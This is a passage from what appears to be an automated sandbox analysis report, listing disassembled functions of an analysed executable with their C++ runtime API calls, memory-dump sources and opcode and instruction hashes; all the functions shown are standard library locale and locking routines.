                                                                                                                                                        • Instruction Fuzzy Hash: 15B12671600200ABEB04EF26C862B6A7B55EF27754F04801EF95A9F3C3DB6D9D41C7A9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AC6B2, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AC6B7
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004AC6C6
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004AC6E6
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AC71D
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004AC733
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004AC740
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1252875284-0
                                                                                                                                                        • Opcode ID: 4208c09d3c31a7207a11edbce58337177fd3ee09deece346f70412583e9c4b9d
                                                                                                                                                        • Instruction ID: 1532d4a1789e685fc3c7f77ba125fff5febf6f56d28cffe721c44bbca1a5455c
                                                                                                                                                        • Opcode Fuzzy Hash: 4208c09d3c31a7207a11edbce58337177fd3ee09deece346f70412583e9c4b9d
                                                                                                                                                        • Instruction Fuzzy Hash: 7511017290012A9BCF14EFA4E845AEE7775EF85360F10426FE415A72A1DB388E01CBD4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AC757, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AC75C
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004AC76B
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004AC78B
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AC7C2
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004AC7D8
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004AC7E5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1252875284-0
                                                                                                                                                        • Opcode ID: 89fdde447de588d82dd395d3e157ed930ec238ed58373e0a5985879c23a97eda
                                                                                                                                                        • Instruction ID: ce3bb4b6a53e495045f9a2ce1b5e6d6481e57294df8fdb446926b189342b7ffb
                                                                                                                                                        • Opcode Fuzzy Hash: 89fdde447de588d82dd395d3e157ed930ec238ed58373e0a5985879c23a97eda
                                                                                                                                                        • Instruction Fuzzy Hash: B111BF3690011A9BCB15EFA4D846AEE7775EF81764F10421EE415A7291DF388A009B98
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AC7FC, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AC801
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004AC810
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004AC830
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AC867
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004AC87D
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004AC88A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1252875284-0
                                                                                                                                                        • Opcode ID: 12711ff82f4cfad4bc35c0e40dedb252f507ae975e838163472fd62897e9f188
                                                                                                                                                        • Instruction ID: d1c26d0cb0ab5df327f75267a8669ebf3615149ef95b41f0c8e522a8c79f3724
                                                                                                                                                        • Opcode Fuzzy Hash: 12711ff82f4cfad4bc35c0e40dedb252f507ae975e838163472fd62897e9f188
                                                                                                                                                        • Instruction Fuzzy Hash: A611BF32D001199BCB54EFA8E845AEE7779FF81361F10461EF415A7291DB389A008795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AC8A1, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AC8A6
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004AC8B5
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004AC8D5
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AC90C
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004AC922
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004AC92F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1252875284-0
                                                                                                                                                        • Opcode ID: a98247c1ee82690e037178881cb42a3b39ffcaacb3ca1cb2036691dfb513a310
                                                                                                                                                        • Instruction ID: 3a246deeec6560509dfe69118ef7a71e5e127421341c2c0faae5af8dfca8f62d
                                                                                                                                                        • Opcode Fuzzy Hash: a98247c1ee82690e037178881cb42a3b39ffcaacb3ca1cb2036691dfb513a310
                                                                                                                                                        • Instruction Fuzzy Hash: DC110172D001199BCF10EFA4D805AEE7779EF91360F10421FF405A72A1DB388E01C795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AC946, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AC94B
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004AC95A
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004AC97A
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AC9B1
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004AC9C7
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004AC9D4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1252875284-0
                                                                                                                                                        • Opcode ID: 82b148d918d653ccc29025242856a44c55c6ebebc5ecf602f2692858ebdc995f
                                                                                                                                                        • Instruction ID: 13b770905170534efcdd766eb0edef51d4bac0a2d36b6c7b8ea54227a139e7d6
                                                                                                                                                        • Opcode Fuzzy Hash: 82b148d918d653ccc29025242856a44c55c6ebebc5ecf602f2692858ebdc995f
                                                                                                                                                        • Instruction Fuzzy Hash: 9111C172D001199BCF14EFA4D845AEFB779FF91364F10421EE419A72A1DB389E00C795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004ACBF3, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004ACBF8
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004ACC07
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004ACC27
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004ACC5E
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004ACC74
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004ACC81
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1252875284-0
                                                                                                                                                        • Opcode ID: a76c2056da9071bea7756f97d7ab22aba11b3df4a84ac6cdedf1b30b8bb715ed
                                                                                                                                                        • Instruction ID: 1901a9809ed08240bb05927a9ce30e5070394b7da30b446d29942a1a40cbc134
                                                                                                                                                        • Opcode Fuzzy Hash: a76c2056da9071bea7756f97d7ab22aba11b3df4a84ac6cdedf1b30b8bb715ed
                                                                                                                                                        • Instruction Fuzzy Hash: A911C1729001299BCF14EFA4D845AEEB775EF92760F10421FE819A73A1DF389A0187D4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004ACCF4, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004ACCF9
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004ACD08
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004ACD28
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004ACD5F
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004ACD75
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004ACD82
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1252875284-0
                                                                                                                                                        • Opcode ID: 8d5219d68cfcc36e7361d5d1b660ee83dec048798063bab11f14e0a8d926df4e
                                                                                                                                                        • Instruction ID: 58e80378439bc6796c2bf779f45b1df79f1be9462c8f56cff7db760480f65eee
                                                                                                                                                        • Opcode Fuzzy Hash: 8d5219d68cfcc36e7361d5d1b660ee83dec048798063bab11f14e0a8d926df4e
                                                                                                                                                        • Instruction Fuzzy Hash: A311C172A001299BCF14EFA4E845AEE7B75FF85360F10466FF815A72A1DF388A01C794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AFA90, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AFA95
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004AFAA4
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004AFAC4
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AFAFB
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004AFB11
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004AFB1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1252875284-0
                                                                                                                                                        • Opcode ID: 2d3f6f0c2d8fba8d42205a371276dc17a0a8872ddc37ea267fe2284d84b651cf
                                                                                                                                                        • Instruction ID: c88a98ae2634358504f07075d77b647679fddab8161275b21ae3c7a1514a3058
                                                                                                                                                        • Opcode Fuzzy Hash: 2d3f6f0c2d8fba8d42205a371276dc17a0a8872ddc37ea267fe2284d84b651cf
                                                                                                                                                        • Instruction Fuzzy Hash: C911C4319101199BCF14EFA4D815AEE7779EF81360F10426FE815A7291DF389E04CBA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E261, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E268
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E272
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E292
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E2C9
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E2E8
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E2F1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: fe71ae4e1e2bbf47811cda42006f8dcd3f4c5c76c481e2982b9e1d505d8a2cfc
                                                                                                                                                        • Instruction ID: dbfd3a82cd5e9d20875b6045803d6e5e35ad65ca5fc93e18d03c5fea84326778
                                                                                                                                                        • Opcode Fuzzy Hash: fe71ae4e1e2bbf47811cda42006f8dcd3f4c5c76c481e2982b9e1d505d8a2cfc
                                                                                                                                                        • Instruction Fuzzy Hash: 4801A535D4011A9BCF01FF60E81AABD7B7ABF84750F54811EF504AB292DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E2FE, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E305
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E30F
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E32F
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E366
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E385
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E38E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: e0cbda21b06b25c9cba2f8e77f4a3288ba7740978440f25d5ab1c7257467f2db
                                                                                                                                                        • Instruction ID: 8533c6be2ba005a4bdbe5797f51fe58321be3fb6113c76b80d5be885b3fee7ce
                                                                                                                                                        • Opcode Fuzzy Hash: e0cbda21b06b25c9cba2f8e77f4a3288ba7740978440f25d5ab1c7257467f2db
                                                                                                                                                        • Instruction Fuzzy Hash: F001A135E0021A9BCF01FB60E81AABD7B76BF84350F58895EF5046B291DF38AD029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E39B, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E3A2
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E3AC
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E3CC
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E403
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E422
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E42B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: 1ad20907bfe3c870faef2c9a8bd25329c254ea1052727e05d238978dfb574a32
                                                                                                                                                        • Instruction ID: fc6c4611423ad42d711d735bef486b1a97072a3d2672336a709902c6474b40a5
                                                                                                                                                        • Opcode Fuzzy Hash: 1ad20907bfe3c870faef2c9a8bd25329c254ea1052727e05d238978dfb574a32
                                                                                                                                                        • Instruction Fuzzy Hash: F301C832D4011A9BCF01FB60D856AFD777ABF98310F54851EE5056B291DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E438, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E43F
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E449
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E469
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E4A0
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E4BF
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E4C8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: a529033491146718b1476bbfc6d561027341443a487dfc422ff33d65ff26124d
                                                                                                                                                        • Instruction ID: f08e75661220e87bdb62a560cc8e01868e38f36ea93170f9891ffa1b46fcdf07
                                                                                                                                                        • Opcode Fuzzy Hash: a529033491146718b1476bbfc6d561027341443a487dfc422ff33d65ff26124d
                                                                                                                                                        • Instruction Fuzzy Hash: 42018231D0021A9BCF01FB60D806ABD7B66BF94360F54815EE5086B2A1DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E749, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E750
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E75A
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E77A
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E7B1
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E7D0
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E7D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: 7d83f90a129eb1b2cdf4391821ef56c3db330970aba2336c4826ae3bb5248595
                                                                                                                                                        • Instruction ID: 558249e0b5faf95efc73031d4c2cbb1b514d082d733793137f8f707643f790a7
                                                                                                                                                        • Opcode Fuzzy Hash: 7d83f90a129eb1b2cdf4391821ef56c3db330970aba2336c4826ae3bb5248595
                                                                                                                                                        • Instruction Fuzzy Hash: C801E131E0012A9BCF15FBA0D84AABD7B36BF84360F54811EE5186B291DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E7E6, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E7ED
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E7F7
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E817
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E84E
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E86D
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E876
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
